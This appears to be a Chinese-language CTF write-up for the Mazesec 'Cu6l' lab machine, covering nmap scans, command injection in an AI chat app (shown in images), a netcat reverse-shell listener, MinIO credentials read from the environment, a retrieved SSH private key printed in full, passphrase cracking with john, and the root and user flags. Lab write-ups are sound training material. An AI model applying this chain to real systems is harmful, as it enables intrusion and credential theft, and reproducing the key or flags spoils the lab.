Mazesec_Cu6l

靶机来源:QQ群-660930334

难度:Easy

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24                                  
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-28 15:04 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00077s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00098s latency).
MAC Address: 08:00:27:CF:79:5A (Oracle VirtualBox virtual NIC)
Nmap scan report for cu6l.dsz (192.168.2.76)
Host is up (0.0014s latency).
MAC Address: 08:00:27:AE:60:51 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 8.49 seconds

靶机IP:192.168.2.76

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.76                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-28 15:05 +0800
Nmap scan report for cu6l.dsz (192.168.2.76)
Host is up (0.00093s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:AE:60:51 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 34.73 seconds

开放端口:22、80

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80 192.168.2.76
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-28 15:06 +0800
Nmap scan report for cu6l.dsz (192.168.2.76)
Host is up (0.00081s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: AI Chat Web Application
MAC Address: 08:00:27:AE:60:51 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds

3.udp扫描

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.76                    
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-28 15:07 +0800
Nmap scan report for cu6l.dsz (192.168.2.76)
Host is up (0.0013s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:AE:60:51 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 108.23 seconds

二、WEN渗透

1、HTTP 服务枚举

访问80端口,提示需要使用域名cu6l.dsz进行访问 img

配置域名解析

1
2
┌──(root㉿kali)-[~/miaosec]
└─# echo "192.168.2.76 cu6l.dsz" >> /etc/hosts

访问cu6l.dsz img

三、命令执行

添加API配置信息,在验证当前API时抓包查看,发现可以执行命令 img

成功执行访问http://127.0.0.1 img

尝试读取/etc/passwd,成功进行读取 img

反弹shell img

成功获取到shell

1
2
3
4
5
6
┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.76] 57974
id
uid=1001(yliken) gid=1001(yliken) groups=1001(yliken)

稳定shell

1
2
3
4
5
6
7
8
/usr/bin/script -qc /bin/bash /dev/null
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

四、权限提升

查看env

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
yliken@cu6l:~$ env
SHELL=/bin/bash
MINIO_SECRET_KEY=dszminioadmin-01
PWD=/home/yliken
LOGNAME=yliken
MINIO_SECURE=false
HOME=/home/yliken
LANG=en_US.UTF-8
MINIO_BUCKET_NAME=avatars
LS_COLORS=
INVOCATION_ID=c24133dbd4bf480c96ca3e6fe56d5354
MINIO_ENDPOINT=127.0.0.1:9000
WERKZEUG_SERVER_FD=4
USER=yliken
SHLVL=1
JOURNAL_STREAM=9:13409
MINIO_ACCESS_KEY=dszminioadmin
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
_=/usr/bin/env
OLDPWD=/home

找到minio的SECRET_KEY和ACCESS_KEY

1
2
3
MINIO_SECRET_KEY=dszminioadmin-01
MINIO_BUCKET_NAME=avatars
MINIO_ACCESS_KEY=dszminioadmin

minio提供了命令管理工具mc

1
wget https://dl.min.io/client/mc/release/linux-amd64/mc

配置minio服务

1
2
3
4
5
6
yliken@cu6l:/tmp$ ./mc alias set myminio http://127.0.0.1:9000 dszminioadmin dszminioadmin-01
mc: Configuration written to `/home/yliken/.mc/config.json`. Please update your access credentials.
mc: Successfully created `/home/yliken/.mc/share`.
mc: Initialized share uploads `/home/yliken/.mc/share/uploads.json` file.
mc: Initialized share downloads `/home/yliken/.mc/share/downloads.json` file.
Added `myminio` successfully.

读取

1
2
3
4
5
6
yliken@cu6l:/tmp$ ./mc ls myminio
[2026-02-06 04:47:44 EST]     0B avatars/
[2026-02-06 05:05:20 EST]     0B mysecret/

yliken@cu6l:/tmp$ ./mc ls myminio/mysecret/ 
[2026-02-06 05:05:34 EST] 3.3KiB STANDARD id_rsa

复制id_rsa到当前目录

1
2
yliken@cu6l:/tmp$ ./mc cp myminio/mysecret/id_rsa ./
...ret/id_rsa: 3.33 KiB / 3.33 KiB ┃▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓┃ 286.34 KiB/s 0syliken@cu6l:/tmp$ ls -la

查看id_rsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
yliken@cu6l:/tmp$ cat id_rsa 
-----BEGIN OPENSSH PRIVATE KEY-----
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
8g3Q==
-----END OPENSSH PRIVATE KEY-----

使用id_rsa进行连接,发现需要密码

1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~/miaosec]
└─# vim id    

┌──(root㉿kali)-[~/miaosec]
└─# chmod 600 id           

┌──(root㉿kali)-[~/miaosec]
└─# ssh -i id root@192.168.2.76               
root@192.168.2.76's password:

使用john进行破解

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/miaosec]
└─# ssh2john id >id.hash 

┌──(root㉿kali)-[~/miaosec]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt id.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
superman         (id)     
1g 0:00:00:02 DONE (2026-02-28 16:35) 0.4739g/s 30.33p/s 30.33c/s 30.33C/s 123456..charlie
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

找到密码为:superman

成功获取到root权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿kali)-[~/miaosec]
└─# ssh -i id root@192.168.2.76
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Enter passphrase for key 'id': 
Linux cu6l 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 26 04:44:06 2026
-bash: warning: setlocale: LC_ALL: cannot change locale (zh_CN.UTF-8)
root@cu6l:~# id
uid=0(root) gid=0(root) groups=0(root)

五、查看FLAG

1
2
3
root@cu6l:~# cat /root/root.txt /home/yliken/user.txt 
flag{root-009520053b00386d1173f3988c55d192}
flag{user-9ffbf43126e33be52cd2bf7e01d627f9}
Maze-sec
#curl #Env #Minio #id_rsa_burf
Mazesec_Cu6l
http://miao-sec.github.io/Maze-sec/Mazesec-Cu6l/
作者
Miao
发布于
2026年2月28日
许可协议
BY-MIAO